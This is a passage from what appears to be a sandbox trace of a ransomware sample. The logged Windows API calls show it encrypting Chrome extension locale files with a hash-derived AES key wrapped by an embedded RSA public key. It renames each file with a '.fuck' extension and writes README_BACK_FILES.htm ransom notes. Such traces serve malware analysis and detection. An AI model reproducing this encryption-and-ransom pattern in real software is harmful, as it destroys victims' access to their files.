out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.628] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987318) returned 1 [0253.629] CryptImportPublicKeyInfo (in: hCryptProv=0x2987318, dwCertEncodingType=0x1, pInfo=0x298f510*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298f540*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298f548*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984fe0) returned 1 [0253.629] CryptEncrypt (in: hKey=0x2984fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.629] CryptEncrypt (in: hKey=0x2984fe0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987ec8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987ec8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.629] WriteFile (in: hFile=0x5d60, lpBuffer=0x2987ec8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987ec8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.630] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd8, lpOverlapped=0x0) returned 1 [0253.632] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0253.632] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0253.632] CloseHandle (hObject=0x5d5c) returned 1 [0253.632] CloseHandle (hObject=0x5d60) returned 1 [0253.632] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), bFailIfExists=0) returned 1 [0253.636] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json", dwFileAttributes=0x0) returned 1 [0253.637] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.gsg")) returned 1 [0253.638] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.fuck")) returned 1 [0253.639] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.639] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.639] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.639] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.639] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.640] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\readme_back_files.htm")) returned 0xffffffff [0253.640] AreFileApisANSI () returned 1 [0253.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3460, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.640] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.641] GetFileType (hFile=0x5d50) returned 0x1 [0253.641] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.642] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.642] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.643] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.643] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.643] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.643] GetLastError () returned 0x0 [0253.643] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json")) returned 0x20 [0253.644] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json", dwFileAttributes=0x80) returned 1 [0253.645] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.645] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.646] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.646] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.649] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.649] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.649] CryptHashData (hHash=0x29846a0, pbData=0x28cb3f0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.649] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984fa0) returned 1 [0253.649] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.649] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.649] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987ca8) returned 1 [0253.649] CryptImportPublicKeyInfo (in: hCryptProv=0x2987ca8, dwCertEncodingType=0x1, pInfo=0x298e670*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e6a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e6a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29853a0) returned 1 [0253.650] CryptEncrypt (in: hKey=0x29853a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.650] CryptEncrypt (in: hKey=0x29853a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987d30*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987d30*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.650] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2987d30*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987d30*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.652] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x10a, lpOverlapped=0x0) returned 1 [0253.653] CryptEncrypt (in: hKey=0x2984fa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x10a, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0253.653] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0253.653] CloseHandle (hObject=0x5d60) returned 1 [0253.653] CloseHandle (hObject=0x5d5c) returned 1 [0253.653] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), bFailIfExists=0) returned 1 [0253.657] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json", dwFileAttributes=0x0) returned 1 [0253.657] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.gsg")) returned 1 [0253.658] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.fuck")) returned 1 [0253.660] CryptDestroyHash (hHash=0x29846a0) returned 1 [0253.660] CryptDestroyKey (hKey=0x2984fa0) returned 1 [0253.660] CryptReleaseContext (hProv=0x298d670, dwFlags=0x0) returned 1 [0253.660] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0253.660] FindClose (in: hFindFile=0x2985ba0 | out: hFindFile=0x2985ba0) returned 1 [0253.660] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\readme_back_files.htm")) returned 0xffffffff [0253.660] AreFileApisANSI () returned 1 [0253.660] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3508, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0253.660] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0253.661] GetFileType (hFile=0x5d50) returned 0x1 [0253.661] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0253.662] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0253.662] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985ba0 [0253.663] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.663] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0253.663] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0253.663] GetLastError () returned 0x0 [0253.663] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json")) returned 0x20 [0253.663] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json", dwFileAttributes=0x80) returned 1 [0253.664] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0253.664] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0253.666] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0253.667] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x298d670) returned 1 [0253.669] CryptCreateHash (in: hProv=0x298d670, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0253.669] lstrlenA (lpString="FGwqCokLNUQpiwojosdrnbCWzMlQm") returned 29 [0253.669] CryptHashData (hHash=0x29846a0, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0253.669] CryptDeriveKey (in: hProv=0x298d670, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2984be0) returned 1 [0253.669] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----l", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0253.669] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0253.669] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2987f50) returned 1 [0253.669] CryptImportPublicKeyInfo (in: hCryptProv=0x2987f50, dwCertEncodingType=0x1, pInfo=0x298e190*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e1c0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e1c8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29853e0) returned 1 [0253.669] CryptEncrypt (in: hKey=0x29853e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0253.670] CryptEncrypt (in: hKey=0x29853e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2987db8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2987db8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0253.670] WriteFile (in: hFile=0x5d60, lpBuffer=0x2987db8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2987db8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0253.671] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xe1, lpOverlapped=0x0) returned 1 [0253.672] CryptEncrypt (in: hKey=0x2984be0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe1, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0253.672] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0253.672] CloseHandle (hObject=0x5d5c) returned 1 [0253.672] CloseHandle (hObject=0x5d60) returned 1 [0253.673] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json"), bFailIfExists=0) returned 1 [0253.676] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json", dwFileAttributes=0x0) returned 1 [0253.677] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json.gsg")) returned 1 [0253.678] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 